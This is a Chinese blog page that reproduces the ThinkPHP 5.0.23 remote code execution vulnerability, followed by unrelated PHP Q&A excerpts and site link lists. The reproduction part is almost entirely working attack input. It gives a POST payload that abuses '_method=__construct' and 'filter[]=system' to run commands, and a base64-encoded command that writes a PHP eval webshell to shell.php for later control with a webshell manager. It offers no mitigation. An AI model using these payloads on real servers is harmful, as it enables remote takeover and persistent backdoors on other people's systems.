程序员经验分享-hwhale

复现ThinkPHP5 5.0.23远程代码执行漏洞

2023-11-07


访问/index.php?s=captcha页面,会出现如下报错:


在这里插入图片描述

执行whoami

 查看当前目录

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

写入一句话木马并访问

aaabbb 这里使用Base64 编码:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php

 可以发现一句话木马已经写入,使用蚁剑等管理工具连接:

查看目录

 复现完成

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

安全

php

安全漏洞

复现ThinkPHP5 5.0.23远程代码执行漏洞 的相关文章

  • PHP:在执行 php 脚本时显示“正在加载”页面

    这就是我现在所拥有的 我有一个网页 当访问该网页时 它会通过开放 API 连接到 Surveygizmo com 检索大量数据 然后将这些数据返回给我进行处理 此过程大约需要 10 12 秒 在执行时 页面只是处于 正在加载 状态 并且我会

  • PHP随机输出数组元素

    我如何从大约 20 个元素的数组中随机回显 5 个元素 Thanks 这有效吗 values array rand input 5 或者 作为更灵活的功能 function randomValues input num 5 return a

  • 如何编辑 Woocommerce 单一产品元模板中显示的内容?

    我正在为客户做一些工作并使用 wordpress woocommerce 他们要求我将类别移动到我已经完成的单个产品页面上的产品名称下 但他们不希望它打印 类别 类别 1 类别 2 等 他们希望删除 类别 并且它实际上只列出类别的名称 而不

  • 带缓存的简约 PHP 模板引擎,但不带 Smarty?

    有大量的问题 https stackoverflow com search q php template engine cache寻找 正确的 PHP 模板引擎 但它们都不专注于缓存 有谁知道一个轻量级 高质量 基于 PHP 5 的模板引擎

  • 性能方面插值(直接插入字符串)VS串联[关闭]

    就目前情况而言 这个问题不太适合我们的问答形式 我们希望答案得到事实 参考资料或专业知识的支持 但这个问题可能会引发辩论 争论 民意调查或扩展讨论 如果您觉得这个问题可以改进并可能重新开放 访问帮助中心 help reopen questi

  • 使用 htaccess 文件重定向[关闭]

    Closed 这个问题是无关 help closed questions 目前不接受答案 Edit 我想重定向一个网址 to www example com location sydney from www example com rss

  • Drupal 模板/主题资源或建议?

    我有兴趣为我正在开发的 Drupal 网站创建自定义主题 我是 Drupal 的新手 但是我在处理构建主题 CSS PHP HTML 所需的基本概念方面拥有相当多的经验 所以 我的问题是 我从哪里开始 有创建 Drupal 主题的规范指南吗

  • AJAX - 上传文件 (HTML5) 和 PHP

    我感觉完全超出了我的深度 但我感觉很接近 我正在尝试使用 AJAX 上传文件 我找到了这个教程http blog new bamboo co uk 2010 7 30 html5 powered ajax file uploads http

  • phpstorm 和 xdebug 之间的连接

    我配置了 phpstorm xdebug 并且能够使用断点调试我的代码 这些天我更新了 php 通过brew 和 xdebug 现在我有 php 5 5 26 和 xdebug 2 3 3 当我尝试调试测试 和代码 时 phpstorm 告

  • 使用 utf-8 文件名发送 MIME 编码的电子邮件附件

    你好亲爱的人们 我花了三天时间在网上搜索答案 但没有找到任何答案 我发现了很多 几乎 的案例 但没有一个正是我正在寻找的 我能够获取希伯来语的主题和正文消息 但无法获取希伯来语的附加文件名 顺便说一句 我对 PHPMailer 等第三方程序

  • 如何在使用 echo 时将字符串与函数调用连接起来?

    我想在我的 echo ed html 字符串中使用两个函数调用返回的值 li a href the permalink the title a li 以下工作正常 echo li a href echo the title echo a l

  • 使用 laravel 5 和 Auth 更新登录的用户帐户设置

    截至今天 我对 Laravel 实际上是任何 PHP 框架 还是个新手 但对 PHP 并不陌生 我创建了我的第一个项目并设法使用预构建的登录Auth系统 我创建了一个新的路线 控制器和模型 名为AccountSettings所以当我去 ac

  • 无法使用symfony2连接数据库oracle

    我需要的 我需要将oracle数据库与symfony2连接 我已经通过 php m 检查过 oci8 pdo odbc odbc 这是我关注的链接https gist github com johnkary 6481664 https gi

  • 如何反转散列和加盐密码? [关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 我正在使用 vBulletin 登录使用它来交叉引用数据库 md5 md5 pass salt 我如何制作一个 PHP 脚本 以便每个密码

  • Preg_split 用逗号,忽略括号,PHP

    我必须分割一个字符串 并且我想避免用括号内的逗号分割它 那么我该如何实现呢 Example string string1 sString1 sString2 ssString1 ssString2 string2 string3 resul

  • 如何在 Yii 框架中从数据库中获取所有表名和列名

    我正在开发一个模块 我想在其中执行动态相关下拉表和列名称功能 前任 获取所有表名称并将其显示在下拉字段中 选择特定表后 我想在下拉字段中再次显示其所有列名称 问题是 1 如何从数据库中获取所有表名 2 如何从表中获取所有列名 我尝试了一些文

  • 使用 Laravel Intervention 库缓存动态图像不起作用

    我目前正在使用 Laravel 5 并利用干预图像集成 http image intervention io http image intervention io 我动态地使用它 因此图像具有如下 URL http example org

  • PHP 中的舍入

    a 0 1 0 7 10 int 0 1 0 7 10 PHP 返回 false 有人能给我解释一下 为什么会发生这种情况吗 第一个返回 8 第二个返回 7 引用PHP 浮点精度手册中的大红色警告 http de3 php net manu

  • 基于 ajax 的弹出窗口中的 Mathjax + CKEditor 4 + CKEditor

    我已经配置了 CKEditor 4 并且我的页面上有以下内容 我的页面中有一个 CKEditor 设置值的两个选项 这两个选项本身分别选项两个基于 ajax 的弹出窗口 这些基于 ajax 的弹出窗口包含 CKEditor 现在我有以下问题

  • 以零开头的字符串/数字的正确格式?

    我正在尝试使用 PHP 创建一个包含电话号码列表的文件 它工作正常 但如果电话号码以零开头 则该数字将从 Excel 文件中删除 有谁知道如何正确设置格式以使其保持不变 Either Set the value explicitly as

随机推荐

  • 3W字长文总结PyTorch中常用的函数

    quad quad PyTorch基本函数更新 quad q

  • 程序开发性能调优之如何降低CPU使用率。

    单核的CUP就100 双核的就60 这谁受的了 咋调都不行 我把所有的效果都关了 还不行 连声音都关了 就剩个窗口模式了 他照样100 咋整啊 改用静态的方式的确是能够大大降低数据库的存取频率 进而降低CPU的使用率 依你所表述的情况来看

  • 谈谈softmax中常出现的温度系数 T (τ)

    2022 4 1 今天再回首来看这篇文章 发现自己写的非常局限 并且基本是在拾人牙慧 缺乏自己的思考与提炼 在阅读了更多文章和做实验进行一些思考之后 重写了这篇博客 主要从对比学习 知识蒸馏 分类训练来谈谈自己对于温度系数的理解 前因 许多

  • [前端]ztree树形菜单在dialog中应用时遇到的坑

    前言 好久没更新了 最近工作时遇到这样一个坑 可苦恼死我了 如果你们遇到同样的问题 可参考一下 同一个组件 也就是dialog中含有ztree 多个地方同时调用 第一次在一个页面打开 ztree可以正常渲染出数据 在第二个页面打开后 ztr

  • (2)STM32+ESP8266+手机网络助手实现AP模式通信

    文章目录 1 实验目的及资源 1 1 目的 1 2 资源 2 串口调试wifi模块 2 1 接线 2 2 AT指令测试 2 3 与手机app通信 3 STM32通过wifi与手机app通信 3 1 使用资源 3 2 串口3初始化 3 3 e

  • git pull origin master 时, 遇到 fatal: refusing to merge unrelated histories 230626

    git pull origin master 时 遇到 fatal refusing to merge unrelated histories 230626 解决办法 加 allow unrelated histories allow un

  • 设计模式(1)-工厂模式

    工厂模式可以将其分为三种 1 简单工厂模式 2 工厂方法模式 3 抽象工厂模式 下面我们一个一个来说 一 简单工厂模式 简单工厂模式 或称静态工厂方法模式 是类的创建模式 简单工厂模式是由一个 工厂对象根据收到的消息决定要创建哪一个类的对象

  • 利用GitHub Actions实现将GitHub代码同步到Gitee

    利用 Github Action 实现将 Github 上面的代码同步到 Gitee 中 同步的原理是利用 SSH 公私钥配对的方式拉取 Github 仓库的代码并推送到 Gitee 仓库中 所以我们需要以下几个步骤 生成 SSH 公私钥

  • 数组实现队列(详细)

    我们都知道 队列是一种先进先出的数据结构 每当有人问你队列是什么 你的回答就是 一种先进先出的数据结构 当然这样的回答也是完全没有错的 它就是一种先进先出的数据结构 为什么我们不能描述的多一点呢 更详细一点 下面我们就来详细的描述一下队列

  • 纠错输出编码(Error-Correcting Output Codes: ECOC)

    最近在利用Error Correcting Output Codes做论文 发现网上没有一种讲的比较清楚的 那我今天就花点时间大致上讲一下这种方法 最初提出ECOC方法的是如下的文章 Solving Multiclass Learning

  • 简述sql注入中万能密码的原理

    进行SQL注入的原理就是将特殊输入作为参数传入web程序 从而欺骗服务器执行信息查询功能 而万能密码则是利用sql库中运算符的优先级使得所传入数据库查询语句恒为true的SQL语句 1 用户登录时 后台执行的数据库查询操作 SQL语句 是

  • GIT 常用命令整理

    常用git命令 欢迎大家参考 1 git介绍 git与svn一样都是基于仓库来管理代码的 不过git的仓库在客户端和服务端都是存在的 我们通常都是在本地进行代码commit 然后再提交到远端服务器仓库的 而svn的话 差不多相当于大家一群人

  • 利用Jmeter做接口测试(功能测试)全流程分析

    利用Jmeter做接口测试怎么做呢 过程真的是超级简单 明白了原理以后 把零碎的知识点填充进去就可以了 所以在学习的过程中 不管学什么 我一直都强调的是要循序渐进 和明白原理和逻辑 这篇文章就来介绍一下如何利用Jmeter做接口测试的流程

  • Maven锦集:Linux/Windows环境安装配置

    前言 Maven在日常开发中 显得尤为重要 比如 RocketMQ的运作 就需提前配置好Maven 一起学习在Linux或Windows不同环境安装和配置Maven 本文以Maven3 8 6为例 温馨提示 如果你本机安装有多个Linux版

  • ROC,AUC及其基于Sklearn的实现

    ROC AUC及其基于Sklearn的实现 ROC和AUC的概念 sklearn的实现 from sklearn metrics import roc curve auc 多分类问题的ROC绘制 代码实现sklearn官方文档 API文档

  • Python之定时器的使用

    python中的定时器的使用 一 必须引入库 import threading 引入库 二 上代码 usr bin python coding UTF 8 import threading 引入库 def name timer print

  • 命令登陆mysql数据库_命令操作Mysql数据库

    MySql中添加用户 新建数据库 用户授权 删除用户 修改密码 注意每行后边都跟个 表示一个命令语句结束 1 新建用户 1 1 登录MYSQL gt mysql u root p gt 密码 1 2 创建用户 登录mysql后创建新用户 后

  • Android屏幕适配全攻略

    Android屏幕适配出现的原因 在我们学习如何进行屏幕适配之前 我们需要先了解下为什么Android需要进行屏幕适配 由于Android系统的开放性 任何用户 开发者 OEM厂商 运营商都可以对Android进行定制 修改成他们想要的样子

  • 2020运营商SDN和NFV的投入超200亿美元

    近两年 在网络领域最火热的非软件定义网络SDN和网络功能虚拟化NFV莫属 并且可以预计 在未来的一段时间内 SDN和NFV都将成为网络世界的 主角 其中SDN将让网络具备可灵活调配资源的能力 从而提高网络利用率 并降低网络服务成本 是未来新

  • 复现ThinkPHP5 5.0.23远程代码执行漏洞

    访问 index php s captcha页面 会出现如下报错 执行whoami 查看当前目录 method construct filter system method get server REQUEST METHOD pwd 写入一

热门标签